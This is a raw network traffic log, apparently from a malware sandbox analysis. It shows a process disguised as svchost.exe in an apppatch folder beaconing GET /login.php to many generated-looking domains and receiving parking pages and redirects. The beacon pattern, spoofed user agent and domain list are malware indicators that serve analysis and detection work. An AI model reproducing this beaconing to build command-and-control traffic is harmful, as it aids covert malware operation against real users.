Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 55357 | 13.248.169.48 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:59:28.902307034 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: pupydeq.com
Sep 8, 2024 08:59:29.366925001 CEST | 259 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 114
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 55358 | 18.208.156.248 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:59:29.110656977 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: pupycag.com
Sep 8, 2024 08:59:29.617265940 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f16f34661847fb372fc650c8a21e7173|8.46.123.33|1725778769|1725778769|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 55359 | 103.150.11.230 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:59:29.617624998 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
Sep 8, 2024 08:59:30.540987968 CEST | 402 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://47.103.150.18:8001/dh/147287063_35134.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
Sep 8, 2024 08:59:51.962636948 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
Sep 8, 2024 08:59:52.350522995 CEST | 402 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:52 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://47.103.150.18:8001/dh/147287063_35134.html#index8?d=lyrysor.com
Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port
22          192.168.2.4  55362        47.103.150.18   8001

Timestamp  Bytes transferred  Direction  Data
Sep 8, 2024 08:59:30.559263945 CEST  288  OUT  GET /dh/147287063_35134.html HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 47.103.150.18:8001
Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
23          192.168.2.4  55378        47.103.150.18   8001              7524  C:\Windows\apppatch\svchost.exe

Timestamp  Bytes transferred  Direction  Data
Sep 8, 2024 08:59:52.357110977 CEST  288  OUT  GET /dh/147287063_35134.html HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 47.103.150.18:8001
Connection: Keep-Alive
Sep 8, 2024 08:59:56.327996016 CEST  722  IN  HTTP/1.1 404 Not Found
Server: openresty/1.21.4.3
Date: Sun, 08 Sep 2024 06:59:56 GMT
Content-Type: text/html
Content-Length: 561
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
24          192.168.2.4  51507        64.225.91.73    80                7524  C:\Windows\apppatch\svchost.exe

Timestamp  Bytes transferred  Direction  Data
Sep 8, 2024 08:59:56.401706934 CEST  243  OUT  GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galynuh.com
Sep 8, 2024 08:59:56.990678072 CEST  816  IN  HTTP/1.1 200 OK
server: nginx/1.18.0 (Ubuntu)
date: Sun, 08 Sep 2024 06:59:56 GMT
content-type: text/html
content-length: 593
last-modified: Wed, 22 Feb 2023 21:25:52 GMT
etag: "63f68860-251"
accept-ranges: bytes
Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
25          192.168.2.4  51508        44.221.84.105   80                7524  C:\Windows\apppatch\svchost.exe

Timestamp  Bytes transferred  Direction  Data
Sep 8, 2024 08:59:56.964843988 CEST  243  OUT  GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadyciz.com
Sep 8, 2024 08:59:57.467156887 CEST  409  IN  HTTP/1.1 200 OK
Server: nginx
Date: Sun, 08 Sep 2024 06:59:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4b59f75789357f8e536e88e3c3065a3a|8.46.123.33|1725778797|1725778797|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
26          192.168.2.4  51509        15.197.240.20   80                7524  C:\Windows\apppatch\svchost.exe

Timestamp  Bytes transferred  Direction  Data
Sep 8, 2024 08:59:56.966459990 CEST  243  OUT  GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexyhuv.com
Sep 8, 2024 08:59:57.467202902 CEST  259  IN  HTTP/1.1 200 OK
Server: openresty
Date: Sun, 08 Sep 2024 06:59:57 GMT
Content-Type: text/html
Content-Length: 114
Connection: keep-alive
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
27          192.168.2.4  51510        103.224.182.252  80                7524  C:\Windows\apppatch\svchost.exe

Timestamp  Bytes transferred  Direction  Data
Sep 8, 2024 08:59:56.973776102 CEST  243  OUT  GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofycot.com
Sep 8, 2024 08:59:57.594935894 CEST  338  IN  HTTP/1.1 302 Found
date: Sun, 08 Sep 2024 06:59:57 GMT
server: Apache
set-cookie: __tad=1725778797.6242731; expires=Wed, 06-Sep-2034 06:59:57 GMT; Max-Age=315360000
location: http://ww16.vofycot.com/login.php?sub1=20240908-1659-57ee-a0d6-041620171ba1
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 0a 0a
Data Ascii:


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
28          192.168.2.4  51511        154.85.183.50   80                7524  C:\Windows\apppatch\svchost.exe

Timestamp  Bytes transferred  Direction  Data
Sep 8, 2024 08:59:56.980659008 CEST  243  OUT  GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyval.com
Sep 8, 2024 08:59:57.848315001 CEST  307  IN  HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 08 Sep 2024 06:59:57 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Sep 8, 2024 08:59:57.849725008 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyval.com
Sep 8, 2024 08:59:58.262165070 CEST | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:57 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 138
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            ETag: "663ee226-8a"
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 51512 | 103.224.212.108 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:59:56.990817070 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyxynyx.com
Sep 8, 2024 08:59:57.579420090 CEST | 340 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 06:59:57 GMT
                                                                                                                                                                                                            server: Apache
                                                                                                                                                                                                            set-cookie: __tad=1725778797.8172407; expires=Wed, 06-Sep-2034 06:59:57 GMT; Max-Age=315360000
                                                                                                                                                                                                            location: http://ww25.lyxynyx.com/login.php?subid1=20240908-1659-57be-bb39-c8c798adf2d1
                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            Data Raw: 0a 0a
                                                                                                                                                                                                            Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 51513 | 64.190.63.136 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:59:57.812057972 CEST | 348 | OUT | GET /login.php?sub1=20240908-1659-57ee-a0d6-041620171ba1 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww16.vofycot.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1725778797.6242731
Sep 8, 2024 08:59:58.507297993 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 06:59:58 GMT
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            transfer-encoding: chunked
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_ElUYGsLu9UKFW47RKUe0CTK1WrvFuX/NwmH6eM8xn7hgPtKqtsiHuZBx1t3iixaHNThxji7h9S3M9e1a4ZHdqg==
                                                                                                                                                                                                            last-modified: Sun, 08 Sep 2024 06:59:58 GMT
                                                                                                                                                                                                            x-cache-miss-from: parking-7768d5b45d-rblrk
                                                                                                                                                                                                            server: Parking/1.0
                                                                                                                                                                                                            Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_ElUYGsLu9UKFW47RKUe0CTK1WrvFuX/NwmH6eM8xn7hgPtKqtsiHuZBx1t3iixaHNThxji7h9S3M9e1a4ZHdqg==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 51514 | 199.59.243.226 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 08:59:57.941899061 CEST | 350 | OUT | GET /login.php?subid1=20240908-1659-57be-bb39-c8c798adf2d1 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww25.lyxynyx.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1725778797.8172407
Sep 8, 2024 08:59:58.405836105 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 06:59:57 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1226
                                                                                                                                                                                                            x-request-id: 78b471bc-836a-4bdd-a218-061e9ffe3948
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OrwK0DZB0DHcdXzNAslOSHAbStH5AjVB/CLAZkg2GV/DwyCtSTQiQ/uWTik7/r9bLmfC2rYAz+Ntlg74GPb7lg==
                                                                                                                                                                                                            set-cookie: parking_session=78b471bc-836a-4bdd-a218-061e9ffe3948; expires=Sun, 08 Sep 2024 07:14:58 GMT; path=/
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_OrwK0DZB0DHcdXzNAslOSHAbStH5AjVB/CLAZkg2GV/DwyCtSTQiQ/uWTik7/r9bLmfC2rYAz+Ntlg74GPb7lg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.405858040 CEST | 660 | IN
                                                                                                                                                                                                            Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzhiNDcxYmMtODM2YS00YmRkLWEyMTgtMDYxZTlmZmUzOTQ4IiwicGFnZV90aW1lIjoxNzI1Nzc4Nzk4LCJwYWdlX3VybCI6I


                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                            32 | 192.168.2.4 | 51515 | 72.52.179.174 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.756098986 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyhub.com


                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                            33 | 192.168.2.4 | 51516 | 64.225.91.73 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.846344948 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyhyg.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.448872089 CEST | 816 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:00 GMT
                                                                                                                                                                                                            content-type: text/html
                                                                                                                                                                                                            content-length: 593
                                                                                                                                                                                                            last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                            etag: "63f68860-251"
                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                            Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                            34 | 192.168.2.4 | 51517 | 72.52.179.174 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.263072014 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyhub.com


                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                            35 | 192.168.2.4 | 51518 | 52.34.198.229 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.535590887 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lygyvuj.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.162983894 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:03 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f6028f88028318723197cc655cefdc6e|8.46.123.33|1725778803|1725778803|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.164383888 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:03 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f6028f88028318723197cc655cefdc6e|8.46.123.33|1725778803|1725778803|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.165016890 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:03 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f6028f88028318723197cc655cefdc6e|8.46.123.33|1725778803|1725778803|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                            36 | 192.168.2.4 | 51936 | 44.221.84.105 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.694504976 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyhiz.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.190821886 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:08 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=b27a42bcee42fae56937005e15f85b78|8.46.123.33|1725778808|1725778808|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                            37 | 192.168.2.4 | 61260 | 199.191.50.83 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.878705025 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com


                                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                            38 | 192.168.2.4 | 61261 | 3.64.163.50 | 80
                                                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.915395021 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
